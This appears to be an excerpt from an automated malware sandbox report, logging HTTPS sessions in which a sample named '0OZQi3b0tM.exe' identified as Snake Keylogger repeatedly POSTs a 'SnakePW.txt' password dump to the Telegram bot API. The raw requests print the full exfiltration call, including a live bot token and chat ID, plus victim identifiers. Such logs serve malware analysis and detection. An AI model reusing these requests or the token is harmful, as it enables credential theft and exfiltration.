                                                                    2022-06-26 07:33:09 UTC122INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66827,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228789,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    73192.168.2.549898149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:09 UTC123OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e6c3ec41
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:09 UTC123OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 36 63 33 65 63 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e6c3ec41Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:09 UTC124INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:09 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:09 UTC124INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66828,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228789,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    74192.168.2.549901149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:09 UTC124OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e701e98c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:09 UTC125OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 30 31 65 39 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e701e98cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:10 UTC125INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:10 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:10 UTC126INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66829,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228790,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    75192.168.2.549904149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:10 UTC126OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e73d84c1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:10 UTC126OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 33 64 38 34 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e73d84c1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:10 UTC127INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:10 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:10 UTC127INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66831,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228790,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    76192.168.2.549906149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:10 UTC128OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e7745a71
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:10 UTC128OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 37 34 35 61 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e7745a71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:10 UTC129INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:10 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:10 UTC129INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66832,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228790,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    77192.168.2.549907149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:10 UTC130OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e7aff527
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:10 UTC130OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 61 66 66 35 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e7aff527Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:11 UTC130INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:11 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:11 UTC131INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66833,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228791,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    78192.168.2.549909149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:11 UTC131OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e7e6cace
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:11 UTC132OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 37 65 36 63 61 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e7e6caceContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:11 UTC132INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:11 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:11 UTC132INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66834,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228791,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    79192.168.2.549911149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:12 UTC133OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e82bef06
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:12 UTC133OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 38 32 62 65 66 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e82bef06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:12 UTC134INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:12 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
